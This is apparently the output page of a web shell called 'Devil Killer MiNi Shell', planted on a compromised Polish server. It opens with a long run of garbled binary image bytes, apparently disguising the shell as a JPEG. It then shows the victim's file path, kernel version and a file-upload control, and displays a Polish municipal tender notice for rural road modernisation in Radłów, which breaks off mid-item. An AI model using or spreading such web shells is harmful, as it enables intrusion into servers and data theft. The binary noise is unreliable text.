JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250625/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250625/0029341201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja dróg dojazdowych do pól w miejscowościach Glów, Radłów, Marcinkowice, Zabawa i Zdrochec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radłów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660915</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">/014/ 678-20-44 w.30</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaradlow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminaradlow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja dróg dojazdowych do pól w miejscowościach Glów, Radłów, Marcinkowice, Zabawa i Zdrochec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-45448f4c-f319-4a00-81b0-461a257d3b04</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00293412</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00071037/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Modernizacja dróg dojazdowych do pól w miejscowościach Glów, Radłów, Marcinkowice, Zabawa i Zdrochec</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-45448f4c-f319-4a00-81b0-461a257d3b04 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ ocds-148610-8c642296-f5b8-425f-9852-01918dd68221 oraz pomocniczo:<br/>https://bip.malopolska.pl/umradlow,m,449807,2025.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Komunikacja między Zamawiającym<br/>a Wykonawcami, w tym składanie ofert oraz przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu środków<br/>komunikacji elektronicznej.<br/>2) Ofertę, wymagane oświadczenia i dokumenty, składa się pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym*.<br/>* Zgodnie z art. 2 ust. 1 pkt 9 ustawy o dowodach osobistych podpis osobisty to zaawansowany podpis elektroniczny w rozumieniu<br/>art. 3 pkt 11 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 910/2014 z dnia 23 lipca 2014 r. w sprawie identyfikacji<br/>elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym oraz uchylającego dyrektywę<br/>1999/93/WE, weryfikowany za pomocą certyfikatu podpisu osobistego.<br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl/ oraz informacje oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>5) Komunikacja w postepowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”).<br/>6) Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadania tzw. Konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>7) Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>8) Maksymalny rozmiar plików przesłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesłanych jako załączniki do jednego formularza).<br/>9) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>10) W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32)77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl/pl/ z zakładce „Zgłoś problem”.<br/>11) W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>glowackit@gminaradlow.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a)	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>b)	Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. Modernizacja dróg dojazdowych do pól w miejscowościach Glów, Radłów, Marcinkowice, Zabawa i Zdrochec<br/>c)	na działce nr 143 w miejscowości Brzeźnica gmina Radłów. Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/>d)	Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>e)	Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się Informacji nt. RODO - załącznik nr 8 do SWZ.<br/>f)	Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>g)	Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>-	obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego;<br/>-	obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">h)	W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku nr 8 do SWZ.<br/>i)	Zamawiający informuje, że:<br/>-	Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>-	Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia. <br/>-	W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>-	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>-	W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>-	W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPI.271.23.25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja zadania pn. Modernizacja dróg dojazdowych do pól w miejscowościach Glów,<br/>Radłów, Marcinkowice, Zabawa i Zdrochec<br/>W skład zadania wchodzą następujące zakresy robót:<br/>1) Modernizacja drogi dojazdowej do pól dz. nr 49 w miejscowości Glów w km 0+200-0+600<br/>a) Charakterystyczne parametry drogi ; długość 400 m, szerokość jezdni 3,50 m<br/>b) Modernizacja drogi będzie polegać na<br/>􀀀 Wykonaniu profilowania i zagęszczenia podłoża na powierzchni 1400 m2.<br/>􀀀 Wykonaniu górnej warstwy podbudowy z kruszywa łamanego o grubości 15 cm na powierzchni 1400m2<br/>􀀀 Formowaniu poboczy ziemnych z ziemi dostarczonej samochodami wraz z zagęszczeniem 20 m3<br/>Szczegółowy zakres i ilości robót oraz ich lokalizację podano w przedmiarze robót oraz innych dokumentach pomocniczych<br/>postępowania<br/>Zakres robót określa:<br/>• Przedmiar robót – Załącznik nr 10 do SWZ<br/>• Charakterystyka robót – Załącznik nr 13 do SWZ.<br/>• Przekroje poprzeczne – Załącznik nr 14 do SWZ<br/>• Mapy lokalizujące zakres – Załącznik nr 12 SWZ<br/>• STWiORB – Załącznik nr 11 do SWZ,<br/>• Projektowane postanowienia umowy – Załącznik nr 9 do SWZ.<br/>2) Modernizacja drogi dojazdowej do pól dz. nr 1002 w miejscowości Marcinkowice w km 0+410-0+725<br/>a) Charakterystyczne parametry drogi ; długość 315 m, szerokość jezdni 3,50 m<br/>b) Modernizacja drogi będzie polegać na<br/>􀀀 Wykonaniu profilowania i zagęszczenia podłoża na powierzchni 1103 m2.<br/>􀀀 Wykonaniu dolnej warstwy podbudowy z kruszywa łamanego o grubości 15 cm na powierzchni 1103 m2<br/>􀀀 Wykonaniu górnej warstwy podbudowy z kruszywa łamanego o grubości 8 cm na powierzchni 1103 m2<br/>􀀀 Formowaniu poboczy ziemnych z ziemi dostarczonej samochodami wraz z zagęszczeniem 35 m3<br/>􀀀 Mechanicznym karczowaniu krzaków na powierzchni 630 m3 wraz z odwozem.<br/>􀀀 Odkopaniu istniejących rowów z odwozem urobku do 2 km 123 m3.<br/>Szczegółowy zakres i ilości robót oraz ich lokalizację podano w przedmiarze robót oraz innych dokumentach pomocniczych<br/>postępowania<br/>Zakres robót określa:<br/>• Przedmiar robót – Załącznik nr 10 do SWZ<br/>• Charakterystyka robót – Załącznik nr 13 do SWZ.<br/>• Przekroje poprzeczne – Załącznik nr 14 do SWZ<br/>• Mapy lokalizujące zakres – Załącznik nr 12 SWZ<br/>• STWiORB – Załącznik nr 11 do SWZ,<br/>• Projektowane postanowienia umowy – Załącznik nr 9 do SWZ.<br/>3) Modernizacja drogi dojazdowej do pól dz. nr 612 w miejscowości Radłów w km 0+000-0+100<br/>a) Charakterystyczne parametry drogi ; długość 100 m, szerokość jezdni 3,00 m<br/>b) Modernizacja drogi będzie polegać na<br/>􀀀 Wykonaniu profilowania i zagęszczenia podłoża na powierzchni 300 m2.<br/>􀀀 Wykonaniu dolnej warstwy podbudowy z kruszywa łamanego o grubości 15 cm na powierzchni 300 m2<br/>􀀀 Wykonaniu górnej warstwy podbudowy z kruszywa łamanego o grubości 8 cm na powierzchni 300 m2<br/>􀀀 Formowaniu poboczy ziemnych z ziemi dostarczonej samochodami wraz z zagęszczeniem 10 m3<br/>􀀀 Odwiezieniu ziemi po odmuleniu rowów wraz z plantowaniem skarp.<br/>Szczegółowy zakres i ilości robót oraz ich lokalizację podano w przedmiarze robót oraz innych dokumentach pomocniczych<br/>postępowania<br/>Zakres robót określa:<br/>• Przedmiar robót – Załącznik nr 10 do SWZ<br/>• Charakterystyka robót – Załącznik nr 13 do SWZ.<br/>• Przekroje poprzeczne – Załącznik nr 14 do SWZ<br/>• Mapy lokalizujące zakres – Załącznik nr 12 SWZ<br/>• STWiORB – Załącznik nr 11 do SWZ,<br/>• Projektowane postanowienia umowy – Załącznik nr 9 do SWZ.<br/>4) Modernizacja drogi dojazdowej do pól dz. nr 232 w miejscowości Zabawa w km 0+060-0+470<br/>a. Charakterystyczne parametry drogi ; długość 410 m, szerokość jezdni 3,50 m<br/>b. Modernizacja drogi będzie polegać na<br/>􀀀 Wykonaniu profilowania i zagęszczenia podłoża na powierzchni 1435 m2.<br/>􀀀 Wykonaniu dolnej warstwy podbudowy z kruszywa łamanego o grubości 15 cm na powierzchni 1435 m2<br/>Ogłoszenie nr 2025/BZP 00293042/01 z dnia 2025-06-25<br/>2025-06-25 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>􀀀 Wykonaniu górnej warstwy podbudowy z kruszywa łamanego o grubości 8 cm na powierzchni 1435 m2<br/>􀀀 Formowaniu poboczy ziemnych z ziemi dostarczonej samochodami wraz z zagęszczeniem 35 m3<br/>􀀀 Wykonaniu odmulenia rowów wraz z odwozem urobku 210 m3.<br/>Szczegółowy zakres i ilości robót oraz ich lokalizację podano w przedmiarze robót oraz innych dokumentach pomocniczych<br/>postępowania<br/>Zakres robót określa:<br/>• Przedmiar robót – Załącznik nr 10 do SWZ<br/>• Charakterystyka robót – Załącznik nr 13 do SWZ.<br/>• Przekroje poprzeczne – Załącznik nr 14 do SWZ<br/>• Mapy lokalizujące zakres – Załącznik nr 12 SWZ<br/>• STWiORB – Załącznik nr 11 do SWZ,<br/>• Projektowane postanowienia umowy – Załącznik nr 9 do SWZ.<br/>5) Modernizacja drogi dojazdowej do pól dz. nr 658/1 w miejscowości Zabawa w km 0+000-0+110<br/>a. Charakterystyczne parametry drogi ; długość 110 m, szerokość jezdni 3,50 m<br/>b. Modernizacja drogi będzie polegać na<br/>􀀀 Wykonaniu profilowania i zagęszczenia podłoża na powierzchni 385 m2.<br/>􀀀 Wykonaniu dolnej warstwy podbudowy z kruszywa łamanego o grubości 15 cm na powierzchni 385 m2<br/>􀀀 Wykonaniu górnej warstwy podbudowy z kruszywa łamanego o grubości 8 cm na powierzchni 385 m2<br/>􀀀 Formowaniu poboczy ziemnych z ziemi dostarczonej samochodami wraz z zagęszczeniem 8 m3<br/>Szczegółowy zakres i ilości robót oraz ich lokalizację podano w przedmiarze robót oraz innych dokumentach pomocniczych<br/>postępowania<br/>Zakres robót określa:<br/>• Przedmiar robót – Załącznik nr 10 do SWZ<br/>• Charakterystyka robót – Załącznik nr 13 do SWZ.<br/>• Przekroje poprzeczne – Załącznik nr 14 do SWZ<br/>• Mapy lokalizujące zakres – Załącznik nr 12 SWZ<br/>• STWiORB – Załącznik nr 11 do SWZ,<br/>• Projektowane postanowienia umowy – Załącznik nr 9 do SWZ.<br/>6) Modernizacja drogi dojazdowej do pól dz. nr 791 w miejscowości Zabawa w km 0+450-0+905<br/>a) Charakterystyczne parametry drogi ; długość 455 m, szerokość jezdni 2,50 m<br/>b) Modernizacja drogi będzie polegać na<br/>􀀀 Wykonaniu koryta na głębokość 20 cm na powierzchni 1138 m2 wraz z wywozem urobku 228 m3.<br/>􀀀 Wykonaniu dolnej warstwy podbudowy z kruszywa łamanego o grubości 20 cm na powierzchni 228 m2<br/>􀀀 Wykonaniu górnej warstwy podbudowy z kruszywa łamanego o grubości 15 cm na powierzchni 228 m2<br/>􀀀 Formowaniu poboczy ziemnych z ziemi dostarczonej samochodami wraz z zagęszczeniem 30 m3<br/>Szczegółowy zakres i ilości robót oraz ich lokalizację podano w przedmiarze robót oraz innych dokumentach pomocniczych<br/>postępowania<br/>Zakres robót określa:<br/>• Przedmiar robót – Załącznik nr 10 do SWZ<br/>• Charakterystyka robót – Załącznik nr 13 do SWZ.<br/>• Przekroje poprzeczne – Załącznik nr 14 do SWZ<br/>• Mapy lokalizujące zakres – Załącznik nr 12 SWZ<br/>• STWiORB – Załącznik nr 11 do SWZ,<br/>• Projektowane postanowienia umowy – Załącznik nr 9 do SWZ.<br/>7) Modernizacja drogi dojazdowej do pól dz. nr 58 w miejscowości Zdrochec w km 0+045-0+545<br/>a) Charakterystyczne parametry drogi ; długość 500 m, szerokość jezdni 2,50 m<br/>b) Modernizacja drogi będzie polegać na<br/>􀀀 Wykonaniu koryta na głębokość 20 cm na powierzchni 1250 m2 wraz z wywozem urobku 250 m3.<br/>􀀀 Wykonaniu dolnej warstwy podbudowy z 